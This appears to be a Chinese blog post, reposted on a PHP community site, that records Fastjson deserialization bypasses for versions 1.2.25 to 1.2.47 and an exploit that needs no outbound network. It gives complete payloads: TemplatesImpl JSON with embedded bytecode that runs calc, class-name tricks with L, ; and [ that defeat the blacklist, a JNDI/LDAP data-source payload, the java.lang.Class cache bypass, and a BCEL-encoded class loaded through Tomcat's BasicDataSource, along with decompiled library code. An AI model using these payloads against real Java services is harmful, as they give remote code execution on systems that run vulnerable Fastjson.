记录一下fastjson历史绕过和不出网分析过程
在1.2.24之后的版本,使用了checkAutotype函数进行校验,校验方式采用黑白名单的方式进行校验
开启AutoTypeSupport的绕过
1.2.25-1.2.41版本绕过
String testt="{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\"_bytecodes\":[\"yv66vgAAADMANAoABwAlCgAmACcIACgKACYAKQcAKgoABQAlBwArAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAZMVGVzdDsBAApFeGNlcHRpb25zBwAsAQAJdHJhbnNmb3JtAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7BwAtAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAAXQHAC4BAApTb3VyY2VGaWxlAQAJVGVzdC5qYXZhDAAIAAkHAC8MADAAMQEABGNhbGMMADIAMwEABFRlc3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9pby9JT0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAHAAAAAAAEAAEACAAJAAIACgAAAEAAAgABAAAADiq3AAG4AAISA7YABFexAAAAAgALAAAADgADAAAACgAEAAsADQAMAAwAAAAMAAEAAAAOAA0ADgAAAA8AAAAEAAEAEAABABEAEgABAAoAAABJAAAABAAAAAGxAAAAAgALAAAABgABAAAADwAMAAAAKgAEAAAAAQANAA4AAAAAAAEAEwAUAAEAAAABABUAFgACAAAAAQAXABgAAwABABEAGQACAAoAAAA/AAAAAwAAAAGxAAAAAgALAAAABgABAAAAEgAMAAAAIAADAAAAAQANAA4AAAAAAAEAEwAUAAEAAAABABoAGwACAA8AAAAEAAEAHAAJAB0AHgACAAoAAABBAAIAAgAAAAm7AAVZtwAGTLEAAAACAAsAAAAKAAIAAAAUAAgAFQAMAAAAFgACAAAACQAfACAAAAAIAAEAIQAOAAEADwAAAAQAAQAiAAEAIwAAAAIAJA==\"],'_name':'a.b','_tfactory':{ },\"_o_________________utputProperties\":{ },\"_name\":\"a\",\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}";
Templateimpl链,开启autotypesupport,报错
Exception in thread "main" com.alibaba.fastjson.JSONException: autoType is not support. com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
问题出在checkAutoType
if (key == JSON.DEFAULT_TYPE_KEY && !lexer.isEnabled(Feature.DisableSpecialKeyDetect)) { ref = lexer.scanSymbol(this.symbolTable, '"'); Class clazz = this.config.checkAutoType(ref, (Class)null);
public Class checkAutoType(String typeName, Class expectClass) { if (typeName == null) { return null; } else { String className = typeName.replace('$', '.'); if (this.autoTypeSupport || expectClass != null) { int i; String deny; for(i = 0; i <this.acceptList.length; ++i) { deny = this.acceptList[i]; if (className.startsWith(deny)) { return TypeUtils.loadClass(typeName, this.defaultClassLoader); } } for(i = 0; i <this.denyList.length; ++i) { deny = this.denyList[i]; if (className.startsWith(deny)) { throw new JSONException("autoType is not support. " + typeName); } } }
acceptList是白名单
denyList是黑名单
可以看到他判断传入的类名开头是否属于黑名单中的类
如果不在黑名单中,就会进行loadClass操作
if (this.autoTypeSupport || expectClass != null) { clazz = TypeUtils.loadClass(typeName, this.defaultClassLoader); }
public static Class loadClass(String className, ClassLoader classLoader) { if (className != null && className.length() != 0) { Class clazz = (Class)mappings.get(className); if (clazz != null) { return clazz; } else if (className.charAt(0) == '[') { Class compOnentType= loadClass(className.substring(1), classLoader); return Array.newInstance(componentType, 0).getClass(); } else if (className.startsWith("L") && className.endsWith(";")) { String newClassName = className.substring(1, className.length() - 1); return loadClass(newClassName, classLoader); } else { try { if (classLoader != null) { clazz = classLoader.loadClass(className); mappings.put(className, clazz); return clazz; } } catch (Throwable var6) { var6.printStackTrace(); } try { ClassLoader cOntextClassLoader= Thread.currentThread().getContextClassLoader(); if (contextClassLoader != null && contextClassLoader != classLoader) { clazz = contextClassLoader.loadClass(className); mappings.put(className, clazz); return clazz; } } catch (Throwable var5) { } try { clazz = Class.forName(className); mappings.put(className, clazz); return clazz; } catch (Throwable var4) { return clazz; } } } else { return null; } }
可以loadClass中遇到[ L ;都有相对于的截取字符串的操作,后续大部分绕过都是基于这个loadClass做文章的
} else if (className.startsWith("L") && className.endsWith(";")) { String newClassName = className.substring(1, className.length() - 1); return loadClass(newClassName, classLoader);
可以看到这里开头为L 结尾为; 会截取其中的字符,然后再进行一个回调
所以payload可以写成
Lcom.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
由于会对loadClass进行回调,所以只需要L和;的数量相对于即可,也可以在其中插入[
LLLLLLLLLLLcom.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;;;;;;
1.2.25-1.2.41
checkAutoType中对className开头字符进行校验,如果是LL开头直接抛出异常,这里可以通过[进行绕过
String test="{\"@type\":\"[LLLLLLLcom.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;;;;;;;\"[{,\"_bytecodes\":[\"yv66vgAAADMANAoABwAlCgAmACcIACgKACYAKQcAKgoABQAlBwArAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAZMVGVzdDsBAApFeGNlcHRpb25zBwAsAQAJdHJhbnNmb3JtAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7BwAtAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAAXQHAC4BAApTb3VyY2VGaWxlAQAJVGVzdC5qYXZhDAAIAAkHAC8MADAAMQEABGNhbGMMADIAMwEABFRlc3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9pby9JT0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAHAAAAAAAEAAEACAAJAAIACgAAAEAAAgABAAAADiq3AAG4AAISA7YABFexAAAAAgALAAAADgADAAAACgAEAAsADQAMAAwAAAAMAAEAAAAOAA0ADgAAAA8AAAAEAAEAEAABABEAEgABAAoAAABJAAAABAAAAAGxAAAAAgALAAAABgABAAAADwAMAAAAKgAEAAAAAQANAA4AAAAAAAEAEwAUAAEAAAABABUAFgACAAAAAQAXABgAAwABABEAGQACAAoAAAA/AAAAAwAAAAGxAAAAAgALAAAABgABAAAAEgAMAAAAIAADAAAAAQANAA4AAAAAAAEAEwAUAAEAAAABABoAGwACAA8AAAAEAAEAHAAJAB0AHgACAAoAAABBAAIAAgAAAAm7AAVZtwAGTLEAAAACAAsAAAAKAAIAAAAUAAgAFQAMAAAAFgACAAAACQAfACAAAAAIAAEAIQAOAAEADwAAAAQAAQAiAAEAIwAAAAIAJA==\"],'_name':'a.b','_tfactory':{ },\"_o_________________utputProperties\":{ },\"_name\":\"a\",\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}";
从1.2.42开始,Fastjson把原本明文形式的黑名单改成了哈希过的黑名单
1.2.25-1.2.42
前置条件,目标需要存在mybatis的包,且版本需要小于3.5.0
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:8888/exploit"}}
无需开启AutoTypeSupport利用
影响版本1.2.25-1.2.47
利用思路是先把要利用的类写入缓存中,第二次在调用
String test3="{\n" + " \"a\":{\n" + " \"@type\":\"java.lang.Class\",\n" + " \"val\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"\n" + " },\n" + " \"b\":{\n" + " \"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\n" + " \"_bytecodes\":[\"yv66vgAAADMANAoABwAlCgAmACcIACgKACYAKQcAKgoABQAlBwArAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAZMVGVzdDsBAApFeGNlcHRpb25zBwAsAQAJdHJhbnNmb3JtAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7BwAtAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAAXQHAC4BAApTb3VyY2VGaWxlAQAJVGVzdC5qYXZhDAAIAAkHAC8MADAAMQEABGNhbGMMADIAMwEABFRlc3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9pby9JT0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAHAAAAAAAEAAEACAAJAAIACgAAAEAAAgABAAAADiq3AAG4AAISA7YABFexAAAAAgALAAAADgADAAAACgAEAAsADQAMAAwAAAAMAAEAAAAOAA0ADgAAAA8AAAAEAAEAEAABABEAEgABAAoAAABJAAAABAAAAAGxAAAAAgALAAAABgABAAAADwAMAAAAKgAEAAAAAQANAA4AAAAAAAEAEwAUAAEAAAABABUAFgACAAAAAQAXABgAAwABABEAGQACAAoAAAA/AAAAAwAAAAGxAAAAAgALAAAABgABAAAAEgAMAAAAIAADAAAAAQANAA4AAAAAAAEAEwAUAAEAAAABABoAGwACAA8AAAAEAAEAHAAJAB0AHgACAAoAAABBAAIAAgAAAAm7AAVZtwAGTLEAAAACAAsAAAAKAAIAAAAUAAgAFQAMAAAAFgACAAAACQAfACAAAAAIAAEAIQAOAAEADwAAAAQAAQAiAAEAIwAAAAIAJA==\"],\n" + " \"_name\":'a.b',\n" + "\t\t'_tfactory':{},\n" + "\t\t'_o_________________utputProperties':{}\n" + " }\n" + "}";
在checkautotype中,先从map中获取类,如果存在则直接返回,否则在进行白名单校验
if (clazz == null) { clazz = this.deserializers.findClass(typeName); }
而java.lang.class正好就在其中,然后会把值缓存进map中,然后再进行触发
MiscCodec.deserialze
} else { Object objVal; if (parser.resolveStatus == 2) { parser.resolveStatus = 0; parser.accept(16); if (lexer.token() != 4) { throw new JSONException("syntax error"); } if (!"val".equals(lexer.stringVal())) { throw new JSONException("syntax error"); } lexer.nextToken(); parser.accept(17); objVal = parser.parse(); parser.accept(13); } else { objVal = parser.parse(); }String strVal; if (objVal == null) { strVal = null; } else { if (!(objVal instanceof String)) { if (objVal instanceof JSONObject && clazz == Entry.class) { JSONObject jsOnObject= (JSONObject)objVal; return jsonObject.entrySet().iterator().next(); } throw new JSONException("expect string"); } strVal = (String)objVal; } if (strVal != null && strVal.length() != 0) { if (clazz == UUID.class) { return UUID.fromString(strVal); } else if (clazz == URI.class) { return URI.create(strVal); } else if (clazz == URL.class) { try { return new URL(strVal); } catch (MalformedURLException var9) { throw new JSONException("create url error", var9); } } else if (clazz == Pattern.class) { return Pattern.compile(strVal); } else if (clazz == Locale.class) { String[] items = strVal.split("_"); if (items.length == 1) { return new Locale(items[0]); } else { return items.length == 2 ? new Locale(items[0], items[1]) : new Locale(items[0], items[1], items[2]); } } else if (clazz == SimpleDateFormat.class) { SimpleDateFormat dateFormat = new SimpleDateFormat(strVal, lexer.getLocale()); dateFormat.setTimeZone(lexer.getTimeZone()); return dateFormat; } else if (clazz != InetAddress.class && clazz != Inet4Address.class && clazz != Inet6Address.class) { if (clazz == File.class) { return new File(strVal); } else if (clazz == TimeZone.class) { return TimeZone.getTimeZone(strVal); } else { if (clazz instanceof ParameterizedType) { ParameterizedType parmeterizedType = (ParameterizedType)clazz; clazz = parmeterizedType.getRawType(); } if (clazz == Class.class) { return TypeUtils.loadClass(strVal, parser.getConfig().getDefaultClassLoader());
loadClass
public static Class loadClass(String className, ClassLoader classLoader) { if (className != null && className.length() != 0) { Class clazz = (Class)mappings.get(className); if (clazz != null) { return clazz; } else if (className.charAt(0) == '[') { Class compOnentType= loadClass(className.substring(1), classLoader); return Array.newInstance(componentType, 0).getClass(); } else if (className.startsWith("L") && className.endsWith(";")) { String newClassName = className.substring(1, className.length() - 1); return loadClass(newClassName, classLoader); } else { try { if (classLoader != null) { clazz = classLoader.loadClass(className); mappings.put(className, clazz); return clazz; } } catch (Throwable var6) { var6.printStackTrace(); } try { ClassLoader cOntextClassLoader= Thread.currentThread().getContextClassLoader(); if (contextClassLoader != null && contextClassLoader != classLoader) { clazz = contextClassLoader.loadClass(className); mappings.put(className, clazz); return clazz; }
在27行把类存入mapping,然后继续扫描字符扫描到下一个@type,进入checkAutoType
public Class checkAutoType(String typeName, Class expectClass) { if (typeName == null) { return null; } else { String className = typeName.replace('$', '.'); if (this.autoTypeSupport || expectClass != null) { int i; String deny; for(i = 0; i <this.acceptList.length; ++i) { deny = this.acceptList[i]; if (className.startsWith(deny)) { return TypeUtils.loadClass(typeName, this.defaultClassLoader); } } for(i = 0; i <this.denyList.length; ++i) { deny = this.denyList[i]; if (className.startsWith(deny)) { throw new JSONException("autoType is not support. " + typeName); } } } Class clazz = TypeUtils.getClassFromMapping(typeName);
getClassFromMapping正好从mapping中取出前面插入的templateimpl,在下面直接return了,所以就导致不需要开启autotype也可以调用任意类的问题
不出网利用
之前面试被问到了,一问三不知md,记录一下,首先是参考kingx师傅写的通过classloader加载bcel字节码
首先需要知道forName和loadClass的区别,forName在加载类的时候,会执行static代码块,而loadClass不会
payload
String bcel="{\n" + " {\n" + " \"aaa\": {\n" + " \"@type\": \"Lorg.apache.tomcat.dbcp.dbcp2.BasicDataSource;\",\n" + " \"driverClassLoader\": {\n" + " \"@type\": \"Lcom.sun.org.apache.bcel.internal.util.ClassLoader;\"\n" + " },\n" + " \"driverClassName\": \"$$BCEL$$$l$8b$I$A$A$A$A$A$A$AmQ$cbN$db$40$U$3d$938$f1$a3$O$81$40$e8$fbAK$8b$93Jd$d3$j$a8$9b$aa$95$aa$ba$a5j$Q$5dt5$99$8e$d2$B$c7$8e$i$H$f1G$ac$d9$d0$aa$L$3e$80$8f$aaz$c6D$B$89X$9a$b9s$cf$3d$f7$dc3$9e$cb$7f$7f$_$A$bcA7$80$87$87$B$k$e1$b1$87$t6$3eu$f1$y$40$N$h$$$9e$bbx$nP$df5$a9$v$de$KT$a3$ce$81$80$f3$$$fb$a9$F$9a$b1I$f5$97$e9h$a0$f3$7d9H$88$b4$e2L$c9$e4$40$e6$c6$e63$d0$v$7e$99$J5b$7dl$92$j$e6$piR$81$f5$e8G$7c$u$8fe$_$91$e9$b0$d7$_r$93$OwJu$99$P$c9_$5dP$W$f0vU2$f3$o$a8$dd$be$e2$98$ac$f7q$ef$fd$89$d2$e3$c2d$vi$8d$7e$n$d5$d1g9$$$3d$f0$3a$CA$3f$9b$e6J$7f0$d6$93o$bdl$db$de$Q$3e$C$X$9b$n$5e$e2$V$f5$e9_m$eb$T$jb$L$R$5d$y$d0$P$d1A$40$9fVC$60$f9$da$e5$de$e0P$abB$60$e5$g$fa6M$L3$e2$c4$60$a8$8by$d2$8e$3a$f1$z$8e$fd5$i$ac$E$b6$a2$F$7f$e6$G$f45$cf$94$9eL$d8$d0$i$b3X$94$97$dd$cf$a5$d2$d8$80$cb$d7$b4_$V$c2$5e$8d$fb$jf$3dF$c1X$eb$fe$868$e3$a1$82$90$7b$bd$E$abhp$P$af$IXB$93$d1$c72Vf$cd$af$b9l$edV$e3$d2$8dF$be$3eV$Z$3d$ac$cd$a7J$b2m$ad$f5$H$95V$f5$i$ce$f7Sx$9f$ba$e7$a8$9f$95$b8$cf$de$g$c7$5b$c5u$9e$ac$ae_$a2$$$95$3d$g$I$e6$T$gp$d0$s$L$b8$cb$e5$a2$S$bb$b8$e7$b0p$bf4$f5$e0$3f$a0$bc$q$X$d0$C$A$A\"\n" + " }\n" + " }: \"bbb\"\n" + "}";
总体思路是,通过getConnection来触发classloader加载bcel字节码
分析如下:
public Connection getConnection() throws SQLException { if (Utils.IS_SECURITY_ENABLED) { BasicDataSource.PaGetConnection action = new BasicDataSource.PaGetConnection(); try { return (Connection)AccessController.doPrivileged(action); } catch (PrivilegedActionException var4) { Throwable cause = var4.getCause(); if (cause instanceof SQLException) { throw (SQLException)cause; } else { throw new SQLException(var4); } } } else { return this.createDataSource().getConnection(); } }
跟入createDataSource
protected DataSource createDataSource() throws SQLException { if (this.closed) { throw new SQLException("Data source is closed"); } else if (this.dataSource != null) { return this.dataSource; } else { synchronized(this) { if (this.dataSource != null) { return this.dataSource; } else { this.jmxRegister(); ConnectionFactory driverCOnnectionFactory= this.createConnectionFactory(); boolean success = false;
跟入createConnectionFactory
protected ConnectionFactory createConnectionFactory() throws SQLException { return ConnectionFactoryFactory.createConnectionFactory(this, DriverFactory.createDriver(this)); }
这里跟入createDriver方法
static Driver createDriver(BasicDataSource basicDataSource) throws SQLException { Driver driverToUse = basicDataSource.getDriver(); String driverClassName = basicDataSource.getDriverClassName(); //获取bcel字节码 ClassLoader driverClassLoader = basicDataSource.getDriverClassLoader(); //获取classloader String url = basicDataSource.getUrl(); if (driverToUse == null) { Class driverFromCCL = null; String message; if (driverClassName != null) { try { try { if (driverClassLoader == null) { driverFromCCL = Class.forName(driverClassName); } else { driverFromCCL = Class.forName(driverClassName, true, driverClassLoader); }
注意15行,这里调用我们自定义的classloader来加载
protected Class loadClass(String class_name, boolean resolve) throws ClassNotFoundException{ Class cl = null; /* First try: lookup hash table. */ if((cl=(Class)classes.get(class_name)) == null) { /* Second try: Load system class using system class loader. You better * don't mess around with them. */ for(int i=0; i if(class_name.startsWith(ignored_packages[i])) { cl = deferTo.loadClass(class_name); break; } } if(cl == null) { JavaClass clazz = null; /* Third try: Special request? */ if(class_name.indexOf("$$BCEL$$") >= 0) clazz = createClass(class_name); else { // Fourth try: Load classes via repository if ((clazz = repository.loadClass(class_name)) != null) { clazz = modifyClass(clazz); } else throw new ClassNotFoundException(class_name); } if(clazz != null) { byte[] bytes = clazz.getBytes(); cl = defineClass(class_name, bytes, 0, bytes.length); } else // Fourth try: Use default class loader cl = Class.forName(class_name); }
24行中,如果开头为$$BCEL$$,则会调用createClass进行处理.
最终造成任意代码执行
京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有 
